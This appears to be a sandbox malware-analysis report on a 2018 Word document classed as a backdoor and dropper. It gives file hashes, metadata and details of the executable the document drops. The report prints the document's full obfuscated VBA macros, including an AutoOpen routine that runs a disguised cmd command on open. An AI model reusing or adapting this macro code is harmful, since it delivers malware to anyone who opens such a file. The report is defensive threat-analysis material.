81f1a5fa...beee | Files
VTI SCORE: 100/100
Dynamic Analysis Report
Classification: Backdoor, Dropper, Downloader

81f1a5faaa792952e49c477f54c75beec7fd03d3a1c250db2b863ec2b669beee (SHA256)

Dokumente-UOM36417800369487.doc

Word Document

Created at 2018-08-01 10:16:00

Notifications (1/1)

The maximum number of reputation URL requests (10 per analysis) was exceeded. As a result, the reputation status could not be queried for all contacted URLs. In order to get the reputation status for all contacted URLs, please increase the 'Max URL Requests' setting in the system configurations.

Files
Filename C:\Users\BGC6u8Oy yXGxkR\Desktop\Dokumente-UOM36417800369487.doc
Category Sample File
Type Word Document
Severity Suspicious
Mime Type application/msword
File Size 94.38 KB
MD5 4fe8618fda1c5141bb946d547fe40b55
SHA1 9d34a049d49d0e2f741ea16ac4c53cfda4397e1d
SHA256 81f1a5faaa792952e49c477f54c75beec7fd03d3a1c250db2b863ec2b669beee
SSDeep 1536:JXWk1Uo0VnotvtY4wAL5/uf4df4df4df4df4dfB+aPAvFVWLDSy:8gUo0V8vtY4Huf4df4df4df4df4dfetk
Parser Error Remark Static analyzer was unable to completely parse the analyzed file
File Reputation Information
Severity Suspicious
First Seen 2018-08-01 12:02 (UTC+2)
Last Seen 2018-08-01 12:08 (UTC+2)
Office Information
Creator Onoweg-PC
Revision 1
Create Time 2018-08-01 06:17:00+00:00
Modify Time 2018-08-01 06:17:00+00:00
Document Information
Codepage Latin-1
Application Microsoft Office Word
App Version 16.0
Template Normal.dotm
Page Count 1
Line Count 1
Paragraph Count 1
Character Count 1
Chars With Spaces 1
Heading Pairs Title
VBA Macros (2)
Macro #1: DusqruXGiRh
Attribute VB_Name = "DusqruXGiRh"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
   AppActivate 342903035
   AppActivate UcpRY
   AppActivate bcjshB
   AppActivate CDbl(ZjPiS)
Shell@ CVar("cm") + HFwcCQPnK + cVKPRTao + VWuoAzvSiR + VmbbjTFLYim + BMRMpufzooz + iaDLjRrA + JNXwwYfYfcNkUP, 184868679 - 184868679
   AppActivate Oct(liuwDr * HpAlr)
   AppActivate CInt(51)
   AppActivate ljBns
End Sub

Macro #2: lqwuoNztFoH
Attribute VB_Name = "lqwuoNztFoH"
Function VWuoAzvSiR()
On Error Resume Next
AppActivate iwjzuY
   AppActivate 31
qHrrYiiSY = "d " + "/V/C" + CStr(Chr(zzdUEvJl + thUGYjnoZ + 34 + rwiNXCH + jDYDozjGb)) + "set " + "pPr=MOAN" + "tGXcfYQDJ" + "ZlJ"
AppActivate CDate(8018)
   AppActivate 11
   AppActivate KpTSY
oHztLqIqO = "qsHzDVpR" + "-8Ix'" + "$iS{@+vC2o" + "=/(W" + "Fbj" + "dh);gekU" + "naru}" + "P7:E, "
AppActivate CSng(2)
   AppActivate Sqr(2007 / lKRMQ - oCEwMo / jfQiS)
   AppActivate ChrB(56968 - Ubkaw)
LEZTtph = "wy0." + "\m&&f" + "or " + "%D in " + "(22"
AppActivate mdvmR
   AppActivate Round(zMTjz)
iozQNjMDza = ";" + "38;65;51;" + "56;17;4" + "7;51;14" + ";14" + ";64;29" + ";55;21;2" + "1;"
AppActivate 3752
   AppActivate Round(97)
oTkFLv = "39" + ";54;51;6" + "5;24" + ";38;44" + ";4" + "5;" + "51;" + "7;4;6" + "4;3;51;4;"
VWuoAzvSiR = qHrrYiiSY + oHztLqIqO + LEZTtph + iozQNjMDza + oTkFLv
   AppActivate Log(pqcpjt)
   AppActivate nHzTiY
   AppActivate 9881
End Function
Function VmbbjTFLYim()
On Error Resume Next
AppActivate Fix(pLwzhO + 17493)
   AppActivate ChrB(99577 * rmswv)
KwvcYdLF = "68;4" + "2;51" + ";44;36;14" + ";30;51;54" + ";4;49;2" + "9;15;" + "62" + ";17;39" + ";28;4" + "7;4;4;22" + ";61;40;40" + ";35"
AppActivate diuwRw
   AppActivate 950
   AppActivate Hex(7)
vlzIkWVtUs = ";46;4" + ";38;" + "50;4;" + "68;54" + ";14;40"
AppActivate Atn(302424527)
   AppActivate Fix(tVfWu)
   AppActivate Sin(94)
uiBiPnYdJ = ";55;70;66;" + "10;33" + ";47;4;" + "4;22;6" + "1;40;40" + ";35" + ";3"
AppActivate CSng(94)
   AppActivate CSng(17129 * 3311 / ujXjsJ + jTlwC)
KiXPKjXjpX = "0" + ";7;30;" + "38;57;17" + ";51;54" + ";4;51;56;" + "22" + ";56;30"
AppActivate Int(32)
   AppActivate VwWmBY
   AppActivate Cos(470)
wQdwikw = ";1" + "7" + ";51;17" + ";" + "68;7;38;70" + ";40;16;6" + ";53;" + "57;6"
AppActivate LZhETv
   AppActivate ChrB(NjQNqa)
ucjqQUMlZ = ";16;3" + "3;47;" + "4" + ";4;22;61;" + "40;40;57" + ";54;7;14;" + "51;44;57;" + "46;17;22" + ";30;"
AppActivate ChrB(wmPdWn)
   AppActivate ChrB(YcwYa)
   AppActivate 273
nwdKLpmv = "7;51;68;7" + ";3" + "8;70;4" + "0;" + "25;67;46;" + "33;47;4;4" + ";22;" + "61;40;40" + ";" + "35;55;1" + "4;30;57;5" + "4"
AppActivate lOVor
   AppActivate AzCXG
PQXuffbKNz = ";55;17;" + "68;7;3" + "8;70;40;" + "5;2" + "5;3" + "6;38;38" + ";2" + "6;33;47;4;"
AppActivate Round(pPDKV)
   AppActivate bnRocO
dqGPcmvUvY = "4;2" + "2;61;4" + "0;40;4;" + "47;" + "51;17;"
AppActivate nzuJt
   AppActivate Sgn(8)
   AppActivate Sgn(4092835)
UZIoPMj = "3" + "0;" + "14;35;" + "51;56;55" + ";70;51" + ";56" + ";30" + ";7;55;54;" + "51;5" + "5;50;14;"
AppActivate CDate(5)
   AppActivate Round(nMJmG)
tZhGzfHZ = "51;68;7;" + "38;70;" + "40;4" + ";44;" + "28;" + "68" + ";31;" + "22;14;30;" + "4" + ";41;28" + ";33;"
AppActivate 56374874
   AppActivate 793
jUiXSkPVTs = "28;48;49" + ";29;42;6;" + "62;6" + "4;39;6" + "4;28;" + "60;" + "37;60;2" + "8;49;29;" + "23" + ";42" + ";30;3"
AppActivate Log(7)
   AppActivate Log(58177 + HOtNIC + 34599 + YqdaD)
   AppActivate Chr(69867 * CzoDba + CIUllS - ckzqj)
LCBYkn = "9;29" + ";51;54;" + "35;61;4;5" + "1;70;22;" + "34;28;69;" + "28;34;29;4" + "2;6;62" + ";34;2" + "8;68;51" + ";27" + ";51" + ";28;49;8;" + "38;56;51;5"
VmbbjTFLYim = KwvcYdLF + vlzIkWVtUs + uiBiPnYdJ + KiXPKjXjpX + wQdwikw + ucjqQUMlZ + nwdKLpmv + PQXuffbKNz + dqGPcmvUvY + UZIoPMj + tZhGzfHZ + jUiXSkPVTs + LCBYkn
   AppActivate 5173
   AppActivate Sgn(5)
End Function
Function BMRMpufzooz()
On Error Resume Next
AppActivate Int(owLAhj)
   AppActivate Sin(OVjMD + dzMzQp)
FaRwcUQzhz = "5;7;47;4" + "1;29;54;1" + "6;1" + "3;64;30;54" + ";64;29;1" + "5;62;17;4"
AppActivate Sin(qDPQU)
   AppActivate CSng(489234647)
vdipzcoUCWh = "8;32;4;5" + "6;66;3" + "2;29;55" + ";21" + ";21" + ";68"
AppActivate hMEOp
   AppActivate ChrW(4192)
jfsEHhX = ";2" + "0;3" + "8" + ";65;54;14;" + "38;55;" + "4" + "6;4" + "3;30;" + "14;"
AppActivate 1455
   AppActivate CDate(FaMuOK)
   AppActivate CInt(129)
nLYkPk = "51;" + "41;29;54" + ";16;13" + ";63;64" + ";29;" + "23;4" + "2;30" + ";48;49;" + "31;4;55;56" + ";" + "4;24;5" + "9;56;38;7;" + "51;1"
AppActivate NfKWj
   AppActivate CLng(BEJCfW)
   AppActivate Log(338)
kCLFJpjp = "7;17;64;2" + "9;23;42" + ";" + "30;49;44" + ";" + "56;" + "51;55;"
AppActivate ChrB(VvpYfA)
   AppActivate 102711605
   AppActivate Tan(59)
jYXCk = "52;49;58;" + "7;55;4;" + "7;47" + ";32;58" + ";58;6" + "4;64;64" + ";64;64;6" + "4;64;"
AppActivate Fix(43)
   AppActivate Oct(pFYChz * GcDCi)
BoXzBaBnDDF = "64;64;" + "6" + "4;6" + "4" + ";64;6" + "4;64;64;" + "64;64" + ";8"
AppActivate CLng(jwfsd / IJsbK)
   AppActivate HuEfMK
zUOUa = "0)do se" + "t Zv=" + "!Zv!!" + "pPr:~" + "%D,1!" + "&&if %D==8" + "0 call %" + "Zv"
AppActivate Sin(WibbQj - CqKcX)
   AppActivate 7579
rEvYXOoV = ":~-362%" + CStr(Chr(CXFwSGmtZNz + LFBzGht + 34 + JiqIQSbAhMHD + qhuQQNiFkd)) + "   "
BMRMpufzooz = FaRwcUQzhz + vdipzcoUCWh + jfsEHhX + nLYkPk + kCLFJpjp + jYXCk + BoXzBaBnDDF + zUOUa + rEvYXOoV
   AppActivate iOPVjT
   AppActivate 21
End Function

Filename c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\aeroroyale.exe
Category Created File
Type Binary
Severity Suspicious
Mime Type application/x-dosexec
File Size 152.00 KB
MD5 09825e3594c3b843b89e84650c05582b
SHA1 0a9e192aa88a331cfa239c7dfba3d768fd76527c
SHA256 46a07c4a907ba444e952dde338443fda6cb0d52202d1f07c916114c38ca9629f
SSDeep 1536:7keo251Lv766vt7QtQwpl8FnKXXKnwgT4m2V9AadfIpZYKpOovk4xKLZT5:AeljLDP1syI0KHji4m25dwESvtMdT5
ImpHash d1b7c726d175fe07a1073d8719fe56df
Parser Error Remark Static analyzer was unable to completely parse the analyzed file
File Reputation Information
Severity Suspicious
First Seen 2018-08-01 11:14 (UTC+2)
Last Seen 2018-08-01 11:14 (UTC+2)
PE Information
Image Base 0x400000
Entry Point 0x41b50e
Size Of Code 0x1c000
Size Of Initialized Data 0xa000
File Type executable
Subsystem windows_gui
Machine Type i386
Compile Timestamp 2017-02-23 03:20:06+00:00
Version Information (2)
LegalCopyright © Microsoft Corporation. All rights reserved.
FileDescription qqqqqqqqqqqqqqqqq
Sections (6)
Name Virtual Address Virtual Size Raw Data Size Raw Data Offset Flags Entropy
.text 0x401000 0x1b796 0x1c000 0x1000 type_dsect, cnt_code, mem_execute, mem_read 7.43
.crt1 0x41d000 0x54e8 0x5000 0x1d000 cnt_initialized_data, mem_read, mem_write 3.28
.idata 0x423000 0x32a 0x1000 0x22000 cnt_initialized_data, lnk_comdat, mem_read 1.31
.z9 0x424000 0x4 0x1000 0x23000 cnt_initialized_data, mem_read 0.01
.rsrc 0x425000 0x2a0 0x1000 0x24000 cnt_initialized_data, mem_read 0.78
.reloc 0x426000 0x6b4 0x1000 0x25000 cnt_initialized_data, mem_discardable, mem_read 3.39
Imports (8)
WINSPOOL.DRV (1)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
DeviceCapabilitiesW 0x0 0x42304c 0x23168 0x22168 0x49
msvcrt.dll (2)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
strncmp 0x0 0x42305c 0x23178 0x22178 0x51f
realloc 0x0 0x423060 0x2317c 0x2217c 0x4ff
OLEAUT32.dll (1)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
VarUI1FromStr 0x88 0x423030 0x2314c 0x2214c -
KERNEL32.dll (6)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
lstrlenA 0x0 0x423014 0x23130 0x22130 0x54d
GetModuleHandleA 0x0 0x423018 0x23134 0x22134 0x215
GetNamedPipeClientSessionId 0x0 0x42301c 0x23138 0x22138 0x21f
GetCurrentThreadId 0x0 0x423020 0x2313c 0x2213c 0x1c5
SwitchToThread 0x0 0x423024 0x23140 0x22140 0x4bc
ConvertFiberToThread 0x0 0x423028 0x23144 0x22144 0x6a
USER32.dll (4)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
DispatchMessageA 0x0 0x423038 0x23154 0x22154 0xae
SendMessageTimeoutA 0x0 0x42303c 0x23158 0x22158 0x27a
PostThreadMessageA 0x0 0x423040 0x2315c 0x2215c 0x238
GetDC 0x0 0x423044 0x23160 0x22160 0x121
WinSCard.dll (1)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
g_rgSCardT1Pci 0x0 0x423054 0x23170 0x22170 0x43
CRYPT32.dll (1)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
CertAddCertificateLinkToStore 0x0 0x423000 0x2311c 0x2211c 0x5
GDI32.dll (2)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
EqualRgn 0x0 0x423008 0x23124 0x22124 0x12d
GetTextCharset 0x0 0x42300c 0x23128 0x22128 0x216
Filename C:\Users\BGC6U8~1\AppData\Local\Temp\F843.tmp
Category Created File
Type Stream
Severity Unknown
Mime Type application/octet-stream
File Size 0.05 KB
MD5 61974b8f808747119a0234c563fda669
SHA1 16bdeca2a2f85bc92c608d84ba8f892b692b2172
SHA256 f188d8900c336dc2745411755c8b90588a2c3d24a99afee9f9e13b8ddd3f53ea
SSDeep 3:PlQVlAVUKbnwRl+RJZ3E:dQPAbwDn
Filename C:\Users\BGC6U8~1\AppData\Local\Temp\F833.tmp
Category Created File
Type Text
Severity Unknown
Mime Type text/plain
File Size 0.08 KB
MD5 172ee94da6ee51655ec4ff88bee8c5eb
SHA1 6c8a98026cb9e733aa1b32f8516d268e831d13b9
SHA256 28886aa73bb5eccdf20c58ade6ba559a89733369743301b30cbb33b9321ca1f7
SSDeep 3:Rq3sFZJiKbNLQDW7q1KcKJRKVJmz:43sPJ38DjKNRo4